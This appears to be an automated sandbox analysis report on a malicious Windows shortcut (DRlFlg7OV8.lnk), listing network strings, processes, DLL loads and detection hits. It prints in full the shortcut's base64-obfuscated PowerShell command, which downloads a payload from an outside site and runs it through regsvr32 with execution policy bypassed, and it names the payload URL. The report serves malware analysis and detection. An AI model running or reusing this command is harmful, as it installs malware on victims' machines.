Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 02 Jan 2025 09:04:36 GMT; Server: Apache; Content-Length: 315; Keep-Alive: timeout=5; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1; Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1252433128.0000027B842E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84574000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://focusmedica.in
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp, gjRzEyUDTV.ps1.0.dr; String found in binary or memory: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
Source: powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000003.00000003.1202965974.000001BD63262000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A862292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B83BB2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 6984, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: DRlFlg7OV8.lnk	LNK file: -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "%tmp%\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "%tmp%\gjRzEyUDTV.ps1"; Remove-Item "%tmp%\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Process Memory Space: powershell.exe PID: 6984, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine	Classification label: mal100.evad.winLNK@7/12@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlc1jgvp.j20.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: DRlFlg7OV8.lnk	Virustotal: Detection: 62%
Source: DRlFlg7OV8.lnk	ReversingLabs: Detection: 66%
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll
Source: DRlFlg7OV8.lnk	LNK file: ..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window Recorder	Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLm
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"

Persistence and Installation Behavior

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe

Boot Survival

